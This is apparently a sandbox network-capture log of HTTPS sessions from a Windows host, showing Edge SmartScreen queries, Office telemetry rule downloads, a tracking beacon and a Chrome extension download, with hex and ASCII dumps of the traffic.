2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-11-09 01:47:33 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	53020	13.91.96.185	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	723	OUT	POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 746 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiNEpGSzNPbktmQ0Q0bW9VNEdZOXNzZz09IiwgImhhc2giOiJqUzNGbVFuYm8yTT0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "636976985063396749.rel.v2" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-09 01:47:33 UTC	746	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-09 01:47:33 UTC	248	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: application/octet-stream Content-Length: 57 Connection: close Server: Kestrel ETag: "638343870221005468" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-09 01:47:33 UTC	57	IN	Data Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d Data Ascii: 9murmur3,MhZ8\<&LiH[?m

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.7	53016	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:33 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: fd5aea5e-c01e-0066-7974-2da1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014733Z-17df447cdb5jg4kthC1DFWux4n00000006ng00000000rr5c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:33 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.7	53018	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:33 UTC	517	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014733Z-16547b76f7f7lhvnhC1DFWa2k00000000abg00000000cta3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:33 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.7	53017	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:34 UTC	495	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:34 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 891c653a-001e-0079-4649-3212e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014733Z-15869dbbcc6sg5zbhC1DFWy5u800000002d000000000euhf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-09 01:47:34 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.7	53021	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:33 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:33 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 89e70e23-001e-0014-478e-2d5151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014733Z-15869dbbcc6m5ms4hC1DFWqm4w00000002a0000000008sm8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:33 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	53023	3.167.152.61	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	925	OUT	GET /b?rn=1731116851926&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1A1E8714CE116135161B9226CFE060A6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	955	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Sat, 09 Nov 2024 01:47:34 GMT Location: /b2?rn=1731116851926&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1A1E8714CE116135161B9226CFE060A6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1483c6dd5b8c2c4ddd31efe1731116854; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1483c6dd5b8c2c4ddd31efe1731116854; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 abe1f16540d67a1618a17aca8742e52e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ORD51-P2 X-Amz-Cf-Id: SAoiJRTsLTV2JR0fHegJh6Adh8QTIxZOar7z3pQHX2095lXKZc3VYw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.7	53026	142.250.113.132	443	1792	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:33 UTC	594	OUT	GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-09 01:47:34 UTC	573	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135771 X-GUploader-UploadID: AHmUCY3BaFJQ0LhdLa2KMOh77zQSoPe1pjksaF2uqxpKScHfNHcq0LBPQlol-9Qk8IPNk5kBTXFPXpqB3w X-Goog-Hash: crc32c=5YFIVw== Server: UploadServer Date: Fri, 08 Nov 2024 05:48:42 GMT Expires: Sat, 08 Nov 2025 05:48:42 GMT Cache-Control: public, max-age=31536000 Age: 71931 Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-09 01:47:34 UTC	805	IN	Data Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: aa 54 89 36 c1 f8 f2 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc Data Ascii: T6Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.\|A\|aGoO{\TiZQ
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: 88 1b 77 cc 06 18 f9 d1 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 Data Ascii: wxC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT\|uKCc$
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: ec 3c 53 7b bd 2b 0d f6 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 Data Ascii: <S{+H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw\|D;havxL:t$!?\3K\|_#L]{kl8Ag&0)lmhf
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: 73 be d1 73 8f fe f4 bd 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 Data Ascii: ss!3Mz0siOldC)'$Gp{C`;tequfB0DL^QbAdz=Z3)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w
2024-11-09 01:47:34 UTC	1378	IN	Data Raw: 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 